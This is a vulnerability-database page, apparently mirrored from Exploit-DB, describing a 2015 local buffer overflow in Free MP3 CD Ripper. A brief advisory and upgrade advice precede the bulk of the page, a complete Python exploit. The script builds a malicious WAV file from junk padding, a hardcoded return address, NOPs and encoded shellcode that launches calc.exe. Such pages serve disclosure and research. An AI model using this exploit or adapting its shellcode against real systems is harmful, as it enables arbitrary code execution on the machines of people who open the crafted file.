header-logo
Suggest Exploit
vendor:
Free MP3 CD Ripper
by:
TUNISIAN CYBER
9.3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Free MP3 CD Ripper
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: YES
Related CWE: N/A
CPE: //a:free_mp3_cd_ripper
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WinXp/Windows 7 Pro
2015

Free MP3 CD Ripper All versions Local Buffer Overflow

Free MP3 CD Ripper is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.

Mitigation:

Upgrade to the latest version of Free MP3 CD Ripper or apply the patch from the vendor.
Source

Exploit-DB raw data:

#!/usr/bin/python
 
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: Free MP3 CD Ripper All versions Local Buffer Overflow
#[+] Date: 20-03-2015
#[+] Type: Local Exploits
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R

## EDB Note: Didn't work with Windows 7.

from struct import pack
file="evilfile.wav"
junk="\x41"*4112
eip = pack('<I',0x7C9D30D7)
nops = "\x90" * 3
#Calc.exe Shellcode
#POC:http://youtu.be/_uvHKonqO2g
shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78"
"\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3"
"\xb4\xae\x7d\x02\xaa\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27\xdd\x48\xfd"
"\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8"
"\x3b\x83\x8e\x83\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98\xf5"
"\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61\xb6\x0e\x2f\x85\x19\x87"
"\xb7\x78\x2f\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca")
writeFile = open (file, "w")
writeFile.write(junk+eip+nops+shellcode)
writeFile.close()